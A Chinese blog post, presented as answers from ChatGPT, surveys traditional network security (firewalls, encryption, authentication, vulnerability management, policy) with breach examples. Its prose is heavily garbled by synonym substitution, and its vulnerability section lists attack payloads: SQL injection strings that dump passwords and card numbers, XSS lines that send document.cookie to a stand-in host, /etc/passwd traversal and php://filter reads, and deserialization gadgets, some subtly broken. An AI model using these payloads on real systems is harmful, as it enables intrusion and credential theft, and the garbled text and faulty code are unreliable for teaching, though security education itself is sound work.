@TOC
ChatGPT(全名:Chat Generative Pre-trained Transformer),美国OpenAI 研发的谈天机器人程序,是人工智能技术驱动的自然言语处理工具。
目录索引: ChatGPT:你真的了解网络安全吗?浅谈网络安全进犯防护进行时之传统的网络安全
ChatGPT:你真的了解网络安全吗?浅谈网络安全进犯防护进行时之网络安全新界说
ChatGPT:你真的了解网络安全吗?浅谈网络安全进犯防护进行时之网络进犯新要挟
ChatGPT:你真的了解网络安全吗?浅谈网络安全进犯防护进行时之网络安全新防护
ChatGPT:你真的了解网络安全吗?浅谈网络安全进犯防护进行时之网络安全新总结
传统的网络安全
发问ChatGPT:什么是传统的网络安全,首要包含哪些方面?
ChatGPT答复如下:
传统的网络安全首要是指对计算机网络体系的维护和防护办法,
以维护计算机网络不受进犯、损坏或盗取灵敏数据。
根据对网络安全领域的普遍理解和实践,传统的网络安全首要包含以下方面:
- 防火墙
要挟:侵略、木马、病毒等歹意进犯。黑客或许会经过缝隙或社交工程等手段打破防火墙,并在体系内部进行进犯和篡改。
2013年,美国零售巨子塔吉特公司(Target)的网络体系遭到黑客进犯,导致近700万张信誉卡数据走漏。查询结果表明,黑客是经过一名供货商的帐号登录了塔吉特公司的网络,然后运用缝隙绕过了防火墙,最后成功侵略体系,盗取很多灵敏数据。
防范办法:加强防火墙的安全性和可靠性,包含设置杂乱暗码、定时更新软件等办法。此外,也能够选用 IPS、IDS 等高档安全设备对网络流量进行深度筛查,及时发现和阻断潜在的进犯行为。
- 加密技术
要挟:数据走漏、盗取和篡改等。黑客或许会经过截获数据包、歹意软件等方式盗取加密数据,并对其进行篡改。
2017年,全球最大的金融机构之一的美国信誉报告公司Equifax遭受了历史上最大的数据走漏事情之一,超过1.43亿人的个人信息和社会安全号码被盗。事情查询发现,黑客运用了一个已知缝隙,然后绕过了Equifax的加密机制,获取了很多的灵敏数据。
前有些加密算法现已被广泛认为是不安全的或简单受到进犯,例如:
MD5:MD5是一种常用的哈希算法,但它现已被证明存在严峻的缺点和碰撞进犯,而且不再合适用于安全灵敏的使用程序中。
SHA-1:SHA-1也是一种常见的哈希算法,但它现已被证明存在严峻的碰撞进犯和安全问题,而且现已被引荐不再运用。
RC4:RC4是一种对称加密算法,曾在许多使用程序中广泛运用。可是,它被证明存在严峻的安全问题,而且被建议不再运用。
防范办法:选用愈加安全的加密算法和密钥办理机制,一起也需求对加密协议进行随机性、不行猜测性和完整性验证。此外,选用数字证书认证等技术,确保通讯双方的身份真实和信息安全。
- 认证与授权
要挟:暗码破解、伪造身份等。黑客或许会经过暴力破解、社交工程、钓鱼等方式获取合法用户的账号暗码和身份证明,然后进行未授权拜访。
2018年,Facebook 遭到了一次大规模的黑客进犯,影响到了超过5000万用户的账户。黑客运用一个代码缝隙,盗用了很多的拜访令牌,然后获取了用户的个人信息和私密音讯。这次事情直接暴露了 Facebook 认证机制的缝隙,也引起了人们对社交媒体隐私的重视。
防范办法:选用愈加安全和杂乱的暗码战略和认证机制,如多要素身份验证等。此外,也需求实行严厉的拜访操控和审计机制,防止未授权拜访和歹意行为。
- 缝隙办理
要挟:黑客或许运用体系缝隙进行进犯和渗透。
2019年,美国政府网络安全机构 NSA 发布了一份正告,称黑客安排正在运用缝隙进犯一些受害者的 VPN 门户。这些进犯活动被称为“Pulse Secure VPN”进犯,黑客运用了特定版别 VPN 的缝隙,以获取办理员授权、履行代码和盗取灵敏数据等。
SQL注入常见进犯方式:
select * from users where name='qiu' or 1=1 # and password='xxx'
select * from user where name='qiu' or 1=1 #' and pass=''
SELECT * FROM users WHERE id=1 AND 1=(SELECT COUNT(*) FROM users GROUP BY CONCAT_WS(':', username, password));
SELECT * FROM users WHERE name='输入的用户名';
SELECT * FROM users WHERE name='' CONVERT(int, (SELECT TOP 1 password_hash FROM users))
-- ';
SELECT * FROM users WHERE username = 'qiu'--' AND password = 'xx'
SELECT * FROM users WHERE id = 1 AND (SELECT COUNT(*) FROM users) > 0
SELECT * FROM users WHERE username='admin' UNION SELECT credit_card_number, expiration_date FROM credit_cards
SELECT * FROM users WHERE username='admin' UNION SELECT NULL,NULL,NULL FROM information_schema.tables --
具体可参阅:[网络安全]SQL注入原理及常见进犯办法简析
xss常见进犯方式:
根底PAYLOAD:
<script>alert('XSS')</script>
直接弹出一个提示框
图片加载PAYLOAD:
<img src=x onerror="alert('XSS!')">
当加载这个图片时,会触发一段歹意脚本
链接跳转PAYLOAD:
<a href="javascript:alert('XSS')">点击我</a>
当用户点击链接时,会履行其间的脚本
Cookie盗取PAYLOAD:
<script>new Image().src="http://xx.com/steal.php?cookie="+document.cookie;</script>
将用户的Cookie信息发送到长途服务器
跳转到假登录页面PAYLOAD:
<script>document.location="http://xx.com/login.php?user="+document.cookie;</script>
伪装成登录页面诈骗用户提交用户名和暗码
文件包含常见进犯方式:
相对路径Payload:一些使用程序或许答使用户输入一个相对路径,进犯者能够运用“../”等相对路径限制符,拜访使用程序目录之外的文件。
../etc/passwd(将会列出除root以外的所有Linux用户信息)
绝对路径Payload:进犯者能够运用绝对路径拜访体系中的文件,如 /etc/passwd 等。
NULL字节Payload:有些使用程序在处理文件名时,只辨认空字节之前的字符,而忽略后边的内容。因而,进犯者能够将 “%00” 或 “\0″(空字符)添加到文件名中,诈骗使用程序只拜访他们指定的文件。
../../../../../../../../../../etc/passwd%00
PHP伪协议Payload:假如使用程序运用PHP作为服务器端脚本解说器,进犯者能够运用PHP伪协议拜访长途文件。
php://filter/convert.base64-encode/resource=../../../etc/passwd
其他协议Payload:除了php协议,进犯者还能够运用其他协议来读取长途文件,比如 file , ftp 等。
file:///etc/passwd
序列化反序列化常见进犯方式: Java运用Payload:Java中常见的序列化和反序列化进犯方式是运用 ObjectInputStream 类进行进犯,进犯者能够结构一个包含歹意代码的序列化方针,例如:
public class Exploit implements Serializable {
public Exploit() throws Exception {
Runtime.getRuntime().exec("calc.exe");
}
}
然后将该方针序列化并经过网络发送到方针使用程序中,运转该序列化方针时就会履行歹意代码(在本例中是打开计算器)。
PHP 运用Payload:PHP中常见的序列化和反序列化进犯方式是运用 unserialize 函数来履行恣意代码,进犯者能够结构一个包含歹意代码的序列化字符串,例如:
O:6:"Exploit":0:{}
当使用程序运用 unserialize 函数解析该字符串时,就会履行歹意代码。
Python 运用Payload:Python中支撑运用 pickle 模块对方针进行序列化和反序列化,进犯者能够结构一个歹意代码并运用 pickle.dump 将其序列化,例如:
import os
class Exploit(object):
def reduce(self):
return (os.system,('calc.exe',))
然后将序列化后的歹意代码发送到方针体系中,运用 pickle.load 能够履行这个歹意代码。
防范办法:树立和施行完善的缝隙办理制度,及时发现和修补体系中的缝隙。一起,也需求定时进行缝隙扫描和评估,确保体系的安全性和稳定性。
- 安全战略
要挟:安全战略不完善、履行不到位等要素或许导致体系被黑客进犯和侵略。
2007年,中国移动曾由于短信群发功能易被运用进行违法行为而被罚款,这直接暴露出其安全战略存在缺点和缝隙。尔后,中国移动加强了对短信渠道的监管和办理,并加强了电子认证及授权方面的技术和使用,进步了对违法行为的辨认和预防才能。
防范办法:树立健全的安全战略和规则,包含网络拜访操控、数据备份、应急响应等方面。一起,也需求加强对职工的培训和意识教育,进步他们的安全意识和才能,削减人为要素对体系安全性的影响。
发问ChatGPT:传统网络安全的侧要点在于什么?
ChatGPT答复如下:
传统的网络安全办法要点在于抵挡来自外部的进犯和要挟,以保证计算机网络的安全性和稳定性。可是,跟着数字化年代的快速发展和信息化程度不断进步,网络安全面临着越来越多的挑战和新型要挟。
总结
以上为浅谈进犯防护进行时之传统的网络安全。
重视我,遇见进犯新姿势,吸纳网安新知识。
我是秋说,我们下次见。
